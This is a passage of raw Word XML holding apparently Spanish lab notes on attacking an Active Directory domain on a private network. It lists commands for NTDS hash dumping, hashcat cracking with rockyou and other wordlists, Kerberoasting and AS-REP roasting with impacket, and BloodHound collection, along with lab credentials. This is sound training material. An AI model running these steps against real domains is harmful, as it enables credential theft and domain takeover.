          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-p “</w:t>
      </w:r>
      <w:r w:rsidR="00500B5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Adm1n123</w:t>
      </w:r>
      <w:r w:rsidRPr="00370892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--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46F4CF26" w14:textId="549064ED" w:rsidR="00500B5A" w:rsidRDefault="00500B5A" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00500B5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="427CAF17" wp14:editId="6731C2AF">
            <wp:extent cx="5943600" cy="2241550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="96957330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73309" name="Imagen 1" descr="Imagen que contiene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2B1" w14:textId="200949A0" w:rsidR="00500B5A" w:rsidRDefault="00500B5A" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00500B5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat /root/.nxc/logs/ntds/WIN-5UL7A982B9B_192.168.5.130_2025-11-25_000504.ntds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> |awk -F ‘:’ ‘{print $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4}’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; hashntds.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468B603F" w14:textId="0C56674C" w:rsidR="00500B5A" w:rsidRDefault="00EE48E7" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE48E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C59318" wp14:editId="3C553DAA">
            <wp:extent cx="5943600" cy="2977515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20397933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3308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E4F" w14:textId="32629B7E" w:rsidR="00EE48E7" w:rsidRDefault="00EE48E7" w:rsidP="00370892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shcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 1000 -a 0 --force hashntds.txt diccionario.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E64BA6" w14:textId="582F4FA9" w:rsidR="00EE48E7" w:rsidRDefault="00EE48E7" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE48E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A0FE03C" wp14:editId="7CBCAE1A">
            <wp:extent cx="5943600" cy="2529205"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="18598835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55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A2A" w14:textId="63F38968" w:rsidR="00EE48E7" w:rsidRDefault="00EE48E7" w:rsidP="00370892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Claves </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encontradas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D86C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> diccionario.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4A822F" w14:textId="264241A3" w:rsidR="00EE48E7" w:rsidRDefault="00EE48E7" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE48E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56DCD631" wp14:editId="78F07CDC">
            <wp:extent cx="3551228" cy="731583"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6140018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01892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7E0" w14:textId="3986345F" w:rsidR="00D86C3E" w:rsidRDefault="00D86C3E" w:rsidP="00370892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shcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 1000 -a 0 --force hashntds.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kaonashi14M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38571E3C" w14:textId="3C148969" w:rsidR="00370892" w:rsidRPr="00370892" w:rsidRDefault="00D86C3E" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06C06CF6" wp14:editId="3316E734">
            <wp:extent cx="5943600" cy="2188210"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="4315563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56346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D4D9" w14:textId="6E2B5313" w:rsidR="00D86C3E" w:rsidRDefault="00D86C3E" w:rsidP="00D86C3E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Claves </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encontrada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kaonashi14M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC7866C" w14:textId="01CC275E" w:rsidR="00D86C3E" w:rsidRDefault="00D86C3E" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="100EE98A" wp14:editId="5ED79DAF">
            <wp:extent cx="3787468" cy="685859"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="4195124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12400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A1ED" w14:textId="73484984" w:rsidR="00D86C3E" w:rsidRDefault="00D86C3E" w:rsidP="00D86C3E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hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 1000 -a 0 --force hashntds.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rockyou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6ADF26" w14:textId="46E76222" w:rsidR="00D86C3E" w:rsidRDefault="00D86C3E" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35AC9B67" wp14:editId="167DE863">
            <wp:extent cx="5943600" cy="2188210"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="11212134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3423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EC8F" w14:textId="2451676E" w:rsidR="00D86C3E" w:rsidRDefault="00D86C3E" w:rsidP="00D86C3E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Claves </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encontrada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ockyou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43977EF7" w14:textId="115E3707" w:rsidR="00D86C3E" w:rsidRDefault="00D86C3E" w:rsidP="00D86C3E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6671C7E8" wp14:editId="753D39FE">
            <wp:extent cx="2956816" cy="403895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2095452077" name="Imagen 1" descr="Imagen que contiene naranja, oscuro, alimentos, televi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2077" name="Imagen 1" descr="Imagen que contiene naranja, oscuro, alimentos, televis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4691" w14:textId="6160DC67" w:rsidR="00CB5B76" w:rsidRDefault="00CB5B76" w:rsidP="00D86C3E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KERBERO ROASTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E8F36A" w14:textId="38DE473A" w:rsidR="00CB5B76" w:rsidRDefault="00CB5B76" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tpdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB5B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440AB4BC" w14:textId="2BE20EE3" w:rsidR="00CB5B76" w:rsidRDefault="00CB5B76" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB5B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A61D6EF" wp14:editId="367F58B4">
            <wp:extent cx="5075360" cy="541067"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="174570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5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1A3" w14:textId="57E60877" w:rsidR="00CB5B76" w:rsidRDefault="00CB5B76" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB5B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>impacket-GetUserSPNs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB5B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enterprise.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dcruz</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clave123</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB5B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB5B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130 -request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5581FEE1" w14:textId="1352C982" w:rsidR="00CB5B76" w:rsidRPr="00CB5B76" w:rsidRDefault="00CB5B76" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB5B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A093174" wp14:editId="641D2064">
            <wp:extent cx="5943600" cy="2313305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7018760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76039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DFD" w14:textId="2CAB35A0" w:rsidR="000663BB" w:rsidRPr="00370892" w:rsidRDefault="00D86C3E" w:rsidP="00F41275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impacket-GetNPUsers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enterprise.com/ -no-pass -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usersfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> usernames.txt -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>outputfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> asrep.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B33EFFA" w14:textId="526309CD" w:rsidR="006941CB" w:rsidRDefault="00905A38" w:rsidP="006514FF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905A38">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C7BEA1F" wp14:editId="7CC475D3">
            <wp:extent cx="5943600" cy="2130425"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="26528021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0214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8C3F" w14:textId="2ABA16FD" w:rsidR="00D86C3E" w:rsidRDefault="00D86C3E" w:rsidP="00D86C3E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mpacket-GetNPUsers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enterprise.com/</w:t>
      </w:r>
      <w:r w:rsidR="00905A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dcruz:’Clave123’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130 -</w:t>
      </w:r>
      <w:r w:rsidR="00921DAB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request &gt; kb.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412B3A2D" w14:textId="1B67F8B5" w:rsidR="00921DAB" w:rsidRDefault="00905A38" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EBCE5E8" wp14:editId="759EAB72">
            <wp:extent cx="5943600" cy="2303780"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="17741251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25105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4B2F" w14:textId="5593448B" w:rsidR="00905A38" w:rsidRDefault="00905A38" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00905A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00905A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 13100 --force -a 0 kb.txt diccionario.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F84EDB" w14:textId="01EBDAE2" w:rsidR="001B42FE" w:rsidRDefault="001B42FE" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5038BB42" wp14:editId="408FDC84">
            <wp:extent cx="5943600" cy="1960880"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="13470708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70888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DE1A" w14:textId="379FFC7C" w:rsidR="001B42FE" w:rsidRDefault="001B42FE" w:rsidP="00D86C3E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Claves </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encontradas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E8DB16E" w14:textId="0A9B5C6F" w:rsidR="00905A38" w:rsidRDefault="00905A38" w:rsidP="00D86C3E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0535CA6C" wp14:editId="315CD707">
            <wp:extent cx="5943600" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="630407234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7234" name="Imagen 1" descr="Imagen que contiene Patrón de fond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AA55" w14:textId="6D32BCB0" w:rsidR="001B42FE" w:rsidRDefault="001B42FE" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B42FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BLOODHOUND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E92A4" w14:textId="2F3AE4DF" w:rsidR="001B42FE" w:rsidRDefault="001B42FE" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B42FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">bloodhound-python -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dcruz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B42FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clave123</w:t>
      </w:r>
      <w:r w:rsidRPr="001B42FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">" -d enterprise.com -ns 192.168.5.130 -c all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001B42FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1069DA" w14:textId="2CACD56A" w:rsidR="001B42FE" w:rsidRDefault="001B42FE" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B42FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D840A76" wp14:editId="575CF9DD">
            <wp:extent cx="5943600" cy="2092325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="897738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38338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95B9" w14:textId="18B266A4" w:rsidR="001B42FE" w:rsidRPr="00A45E03" w:rsidRDefault="00A45E03" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="00A45E03">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:7474</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A45E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>neo4js</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>neo4js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Admin123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB7ED5" w14:textId="45369D88" w:rsidR="001B42FE" w:rsidRDefault="001B42FE" w:rsidP="00D86C3E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B42FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B46370E" wp14:editId="379CA729">
            <wp:extent cx="5943600" cy="2762885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
